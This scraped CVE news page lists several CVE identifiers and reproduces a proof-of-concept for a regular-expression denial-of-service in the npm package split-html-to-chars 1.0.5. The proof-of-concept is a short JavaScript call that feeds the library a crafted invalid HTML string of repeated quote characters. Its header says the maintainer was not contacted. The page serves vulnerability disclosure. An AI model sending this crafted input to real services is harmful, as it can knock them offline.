CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in split-html-to-chars v1.0.5 when splitting crafted invalid htmls.

Permalink

/\*\*

\* split-html-to-chars@1.0.5

\* Package Manager: npm

\* Link to published package: https://github.com/akella/split-html-to-chars

\* Link to GitHub repo: https://github.com/akella/split-html-to-chars

\* Severity level: High

\* Module Description: Split html to letters for animation

\* Additional Info: It allows cause a denial of service when splitting crafted invalid htmls.

\* Contacted maintainer?: No

\* Open issue?: No

\*/

var Splitter \= require("split-html-to-chars/index.js")

Splitter('<!""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""!', '$', '<span class="word">$</span>')

Headline

CVE-2021-40897: SaveResults/split-html-to-chars.js at main · yetingli/SaveResults

CVE: Latest News